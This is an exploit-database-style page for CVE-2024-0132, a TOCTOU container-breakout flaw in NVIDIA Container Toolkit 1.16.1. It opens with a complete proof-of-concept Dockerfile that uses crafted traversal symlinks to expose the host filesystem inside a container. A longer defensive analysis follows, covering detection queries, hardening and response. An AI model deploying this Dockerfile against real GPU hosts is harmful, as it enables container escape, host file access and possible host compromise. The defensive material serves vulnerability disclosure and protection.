NVIDIA Container Toolkit 1.16.1 - Time-of-check Time-of-Use (TOCTOU)

Exploit Author: r0binak Analysis Author: www.bubbleslearn.ir Category: Local Language: Shell Published Date: 2025-03-26

# Exploit Title: Container Breakout with NVIDIA Container Toolkit
# Date: 17/02/2025
# Exploit Author: r0binak
#Software Link Homepage: https://github.com/NVIDIA/nvidia-container-toolkit
# Version: 1.16.1
# Tested on: NVIDIA Container Tooklit 1.16.1
# CVE: CVE-2024-0132

Description: NVIDIA Container Toolkit 1.16.1 or earlier contains a
Time-of-check Time-of-Use (TOCTOU) vulnerability when used with
default configuration where a specifically crafted container image may
gain access to the host file system. This does not impact use cases
where CDI is used. A successful exploit of this vulnerability may lead
to code execution, denial of service, escalation of privileges,
information disclosure, and data tampering.

PoC link: https://github.com/r0binak/CVE-2024-0132

Steps to Reproduce:

Build and run a docker image based on such a Dockerfile:

FROM ubuntu

RUN mkdir -p /usr/local/cuda/compat/

RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test >
/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs

RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../
/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs

RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1

RUN ln -s /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
/usr/local/cuda/compat/libxxx.so.2

The host file system will reside in
/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/

Regards,
Sergey `*r0binak*` Kanibor

NVIDIA Container Toolkit 1.16.1 — TOCTOU vulnerability (CVE-2024-0132): analysis, impact, and mitigation

This article explains the Time‑of‑check Time‑of‑Use (TOCTOU) vulnerability reported against NVIDIA Container Toolkit (CVE-2024-0132), the root cause, attacker capabilities, indicators, detection approaches, and practical mitigations and hardening recommendations for operators and security teams. The goal is to provide a defensible, operationally useful, and safe security guide for administrators who run GPU workloads in containerized environments.

Executive summary

Product affected: NVIDIA Container Toolkit (nvidia-container-toolkit / nvidia-container-runtime) version 1.16.1 and earlier, in default configuration.
Vulnerability class: Time‑of‑check Time‑of‑Use (TOCTOU) / race condition combined with symlink handling during compatibility library discovery.
Impact: A crafted image may cause the toolkit to bind or expose parts of the host filesystem into the container's view, potentially leading to container escape, privilege escalation, arbitrary code execution, information disclosure, or tampering.
Scope: The issue primarily affects default invocation paths used by the toolkit; it does not affect deployments that use CDI (Container Device Interface) files for device provisioning when configured correctly.
Mitigation priorities: 1) upgrade to a vendor‑released patch, 2) use CDI where possible, and 3) apply container runtime hardening and host protections.

Technical background (high level)

TOCTOU vulnerabilities arise when a process checks a filesystem condition (time‑of‑check) and then performs an action (time‑of‑use) assuming that the condition has not changed. In the context of the NVIDIA Container Toolkit, the toolkit performs discovery and mapping of CUDA compatibility libraries and helper files before starting a container or when preparing runtime hooks. If an attacker-supplied image contains crafted filesystem entries (notably symlinks and directory structures), an attacker can manipulate the resolution path between the check and the bind/mount operation so that files or directories on the host are exposed to the container.

Practically, this is a semantic class of attack where resolution of symlinks and directory traversal combined with race windows allows access to paths that were intended to be restricted. When executed successfully, the attacker can obtain access to files on the host or influence host-side operations performed by the toolkit.

Why this is serious

Containers are supposed to provide isolation; a breakout that exposes host files undermines that isolation.
Because the toolkit runs as part of the runtime support for GPUs, it can be executed in privileged runtime stages and therefore gives the attacker a powerful opportunity if exploited.
Real-world consequences include code execution on the host, data exfiltration, tampering with binaries or keys, or disrupting cluster-wide GPU workflows.

Exploitation complexity

Exploitation requires the ability to run or inject a container image into the target environment (i.e., the attacker must be able to start containers using the targeted toolkit/runtime).
Exploitation typically needs crafted filesystem layout (symlinks and directory structure) inside the image. This is non-trivial but feasible for attackers who can supply images.
Successful exploitation may depend on timing/races; some setups make it harder (e.g., hardened kernels, user namespaces, or alternative device provisioning mechanisms such as CDI).

Detection and indicators of compromise (IoCs)

Below are practical detection ideas you can use to look for attempted or successful exploitation. These checks are defensive and intended for host or orchestrator monitoring.

Filesystem and symlink inspection

# Example: find suspicious symlinks and non-standard files under common CUDA compatibility dirs
# (This is a safe forensics-style query; it looks for symlinks and unexpected file types)
find /usr/local/cuda/compat /usr/lib -maxdepth 4 -type l -ls
find /usr/local/cuda/compat /usr/lib -maxdepth 4 -not -type f -not -type d -not -type l -ls

Explanation: This command lists symbolic links and unusual file types under typical compatibility and library locations. An attacker may create symlinks that try to escape intended directory isolation. Use this as an investigative step — correlate with container image provenance and timestamps.

OSQuery / audit rules for persistent monitoring

# Example osquery scheduled query to catch newly created symlinks under runtime-related directories
SELECT path, target, mtime, uid, gid FROM file WHERE path LIKE '/usr/local/cuda/compat/%' AND file_type = 'link';

Explanation: The osquery query above can be scheduled to detect new symlinks in locations used by GPU compatibility layers. Alert on unexpected owners, recent mtime, or symlinks pointing outside expected prefixes.

Logging and runtime event monitoring

Monitor container creation events: which images are launched, by which user, and from which orchestration context.
Collect and analyze audit logs (Linux auditd) for unexpected file opens to sensitive host paths originating from container runtimes (check openat/execve syscalls from the runtime process or its helpers).
Watch for changes to /etc, /root, /var/lib/docker, or package directories on the host shortly after container start.

Mitigations and hardening (practical recommendations)

Prioritize vendor patches, then apply layered runtime and host hardening.

1) Patch and vendor guidance

Primary mitigation: apply the vendor-supplied patch from NVIDIA. Check the NVIDIA GitHub repository and official security advisories for the fixed release and upgrade as soon as possible.
If you cannot immediately upgrade, apply the defensive mitigations described below until a patch is possible.

2) Use CDI (Container Device Interface) for GPU device provisioning

CDI is a device provisioning model that removes the need for the toolkit's legacy compatibility discovery path in many deployments. If your workflow supports CDI, adopt it to avoid the vulnerable code path.

3) Reduce container privileges and capabilities

# Defensive container options (example)
docker run --rm \
  --read-only \
  --cap-drop ALL \
  --security-opt no-new-privileges \
  --security-opt seccomp=/path/to/restrictive-seccomp.json \
  --device /dev/nvidia0:/dev/nvidia0:ro \
  your-gpu-image

Explanation: The example shows how to reduce privileges when launching a container: run root filesystem read-only, drop all capabilities and prevent privilege escalation, and apply a restrictive seccomp profile. Map GPU devices explicitly and read-only when possible. These options reduce attack surface and make TOCTOU exploitation harder.

4) Enforce host-level confinement for runtimes

Configure the container runtime (dockerd/containerd) to enforce no-new-privileges for containers by default where possible.
Use AppArmor or SELinux profiles to confine runtime helper processes and restrict file accesses to expected paths.
On systemd-managed hosts, apply stronger protections for the container runtime service unit (example below).

# Example systemd unit snippets for docker/containerd to reduce host-access
# Place in an override file (systemctl edit docker.service)
[Service]
ProtectSystem=full
ProtectHome=yes
NoNewPrivileges=yes
PrivateTmp=yes
PrivateDevices=yes
ReadOnlyPaths=/usr/local/cuda
# Add other ReadOnlyPaths or InaccessiblePaths as needed

Explanation: systemd service protections such as ProtectSystem and NoNewPrivileges limit the runtime helper's ability to access or modify the host filesystem, reducing the impact of a TOCTOU or similar vulnerability.

5) Enforce image provenance, admission controls, and least privilege

Require signed images and use admission controllers (e.g., Kubernetes image policies, Open Policy Agent) to block untrusted images.
Restrict who can run containers with GPU access. Limit GPU access to trusted tenants and namespaces.
Prefer non‑privileged runtime profiles. Avoid running containers as privileged or with host mounts unless strictly necessary.

6) Host filesystem protection and mount options

Avoid unnecessarily writable mounts of host paths into containers (especially /usr, /lib, /etc, /root).
Protect sensitive host directories with mount options such as nodev, nosuid, noexec where appropriate.
Use read-only bind mounts for directories that must be exposed to containers.

Response and remediation checklist

Inventory: identify all hosts running NVIDIA Container Toolkit and the versions in use.
Patch: plan and deploy the vendor patch or upgraded toolkit release as soon as practical.
Restrict: until patched, isolate GPU hosts, restrict image sources, tighten runtime configuration, and apply the hardening measures above.
Scan and investigate: run the detection queries from the Detection section against hosts to look for suspicious symlinks or changes.
Monitor: increase logging level for container runtime operations and monitor for anomalous file accesses or container launches.

Forensics and investigating suspected exploitation

Collect auditd logs around the container start time to find opens/closes/execs that target host paths.
Check timestamps and ownership of files in typical compatibility directories (e.g., /usr/local/cuda/compat and library dirs) and correlate with container image pulls and starts.
Retrieve container image provenance and perform a static analysis of the image filesystem for crafted symlinks or unusual directory structures.
Isolate affected hosts and preserve volatile artifacts (dmesg, /proc/*/mountinfo, runtime logs) for analysis.

Conclusion and recommended immediate actions

Apply the official NVIDIA patch (highest priority).
Where possible, migrate to CDI-based device provisioning to avoid the affected discovery code path.
Tighten runtime configurations: disable unnecessary privileges, adopt no-new-privileges, use seccomp/AppArmor/SELinux, and restrict who can start GPU-enabled containers.
Deploy continuous detection (osquery/auditd/SIEM) to promptly surface signs of exploitation and suspicious filesystem changes.

References & where to learn more

Vendor advisories and the NVIDIA Container Toolkit GitHub repository — always defer to the vendor's published remediation steps.
Linux kernel and OCI runtime best practices for container isolation (seccomp, AppArmor, SELinux, capabilities).
Container Device Interface (CDI) documentation for secure GPU device provisioning.